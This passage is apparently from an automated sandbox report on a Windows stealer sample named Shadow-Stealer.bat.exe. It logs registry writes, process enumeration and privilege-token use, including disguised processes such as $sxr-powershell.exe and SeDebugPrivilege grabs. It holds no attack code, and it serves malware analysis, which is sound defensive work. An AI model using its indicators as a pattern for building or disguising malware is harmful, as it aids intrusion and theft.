| Set value (str) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\2151f160-fd5c-4d32 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7b8e0197-4d56-4b59 = "0" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d8d78d58-93cd-47c8 = "8324" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9c458510-c332-4d3e = "0" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9c458510-c332-4d3e = [value removed] | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b43bce89-a078-4b16 = "\\\\?\\Volume{77C203EA-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\db3e2a0dfacd9c43e7636fedbdb46e65f90a7e290d4e40fa97f28ce82e35f6dd" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b43bce89-a078-4b16 = "0" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\28ef3c51-9c09-4a07 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\28ef3c51-9c09-4a07 = "0" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\2151f160-fd5c-4d32 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a92d4245-418e-4a4d = "8324" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\cac1e44a-d821-4a00 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\28ef3c51-9c09-4a07 = b2be7d5fe1b0da01 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\2151f160-fd5c-4d32 = "8324" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\2151f160-fd5c-4d32 = [value removed] | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\cac1e44a-d821-4a00 = d6d8845fe1b0da01 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7b8e0197-4d56-4b59 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7b8e0197-4d56-4b59 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a92d4245-418e-4a4d | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\28ef3c51-9c09-4a07 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\cac1e44a-d821-4a00 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\Extensible Cache\BackgroundTr = "INetHistory\\BackgroundTransferApiGroup" | C:\Windows\system32\DllHost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable | C:\Windows\System32\RuntimeBroker.exe | N/A |
Key created \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7b8e0197-4d56-4b59 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7b8e0197-4d56-4b59 = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b43bce89-a078-4b16 C:\Windows\System32\RuntimeBroker.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\28ef3c51-9c09-4a07 C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\2151f160-fd5c-4d32 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\2151f160-fd5c-4d32 = b9c6835fe1b0da01 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\cac1e44a-d821-4a00 = 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 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9c458510-c332-4d3e = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9c458510-c332-4d3e = "\\\\?\\Volume{77C203EA-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\58ef1de56d2dca62a430c4bb683322e09825d22a9d93a4282c21e7ca9807eedc" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a92d4245-418e-4a4d = 4c603260e1b0da01 C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Windows\$sxr-mshta.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b43bce89-a078-4b16 = 9123625fe1b0da01 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b43bce89-a078-4b16 = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\cac1e44a-d821-4a00 = "\\\\?\\Volume{77C203EA-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\58ef1de56d2dca62a430c4bb683322e09825d22a9d93a4282c21e7ca9807eedc" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d8d78d58-93cd-47c8 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d8d78d58-93cd-47c8 = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000aac7a25fe1b0da01c7fefa5fe1b0da01c7fefa5fe1b0da01e25606000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061
006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000bc58894b2000646233653261306466616364396334336537363336666564626462343665363566393061376532393064346534306661393766323863653832653335663664640000b20009000400efbebc58894bbc58894b2e0000000000000000000000000000000000000000000000000052014d00640062003300650032006100300064006600610063006400390063003400330065003700360033003600660065006400620064006200340036006500360035006600390030006100370065003200390030006400340065003400300066006100390037006600320038006300650038003200650033003500660036006400640000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000ad935d631000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c64623365326130646661636439633433653736333666656462646234366536356639306137653239306434653430666139376632386365383265333566366464000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000006f79686b657073700000000000000000bec64950ab2ed349b7ae457a2f4666b3f7f788fe3f0def11969966afb9d723e1bec64950ab2ed349b7ae457a2f4666b3f7f788fe3f0def11969966afb9d723e1d2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d003300300030003100
3100300035003500330034002d0032003700300035003900310038003500300034002d0032003900350036003600310038003700370039002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000ea03c277000000000000d01200000000000000000000000000000000 C:\Windows\System32\RuntimeBroker.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\2151f160-fd5c-4d32 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\Extensible Cache\BackgroundTr = "9" C:\Windows\system32\DllHost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\28ef3c51-9c09-4a07 = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\2151f160-fd5c-4d32 = "\\\\?\\Volume{77C203EA-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\7ed11556e0761b6e0764bdb39a077fcd9fbaaa63ca46e07b80b5f5faa4d595c4" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\2151f160-fd5c-4d32 = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7b8e0197-4d56-4b59 = 00d91a60e1b0da01 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7b8e0197-4d56-4b59 = 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 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a92d4245-418e-4a4d = "\\\\?\\Volume{77C203EA-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\7ed11556e0761b6e0764bdb39a077fcd9fbaaa63ca46e07b80b5f5faa4d595c4" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\Extensible Cache\BackgroundTr = "1" C:\Windows\system32\DllHost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\28ef3c51-9c09-4a07 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d8d78d58-93cd-47c8 = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a92d4245-418e-4a4d = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\cac1e44a-d821-4a00 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a92d4245-418e-4a4d C:\Windows\System32\RuntimeBroker.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\dllhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\dllhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\$sxr-powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\$sxr-powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\dllhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\dllhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\$sxr-powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\$sxr-powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\dllhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\dllhost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
